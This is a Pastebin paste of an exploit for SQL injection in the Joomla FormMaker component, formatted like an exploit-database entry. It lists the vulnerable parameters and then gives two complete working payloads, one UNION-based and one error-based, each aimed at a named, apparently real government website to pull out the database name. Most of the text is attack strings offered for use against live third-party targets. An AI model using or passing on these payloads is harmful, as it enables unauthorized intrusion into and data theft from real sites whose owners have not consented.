CrashBandicot

Joomla FormMaker Component - SQL Injection Vulnerability

Apr 1st, 2015
10,876
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.31 KB | None | 0 0
  1. ######################################################################
  2. # Exploit Title: Joomla FormMaker Component - SQL Injection Vulnerability
  3. # Google Dork: Y0ur Brain
  4. # Date: 28.03.2015
  5. # Exploit Author: CrashBandicot (@DosPerl)
  6. # Vendor HomePage: http://extensions.joomla.org/extension/form-maker
  7. # Tested on: Windows
  8. ######################################################################
  9.  
  10.  
  11. # Exploit : index.php?option=com_formmaker&view=formmaker&id=-5653 {SQLi}&Itemid=45
  12. #           index.php?option=com_formmaker&task=paypal_info&tmpl=component&id=-1 {SQLi}
  13.  
  14.  
  15. # ~ Demo ~ # $>
  16.  
  17. # Example :
  18. # Type: MySQL UNION query (NULL) - with 28 columns
  19. # URI: http://www.cabinet.gov.zm/index.php?option=com_formmaker&view=formmaker&id=-5653 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170707671,IFNULL(CAST(database() AS CHAR),0x20),0x71767a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&Itemid=45
  20.  
  21. # Other Example :
  22. # Type: error-based
  23. # URI: http://www.ppsppa.gov.my/index.php/ms/?option=com_formmaker&view=formmaker&id=1 AND (SELECT 4784 FROM(SELECT COUNT(*),CONCAT(0x7170767671,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x71706b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Itemid=837
  24.  
  25. #EOF
Advertisement
Add Comment
Please, Sign In to add comment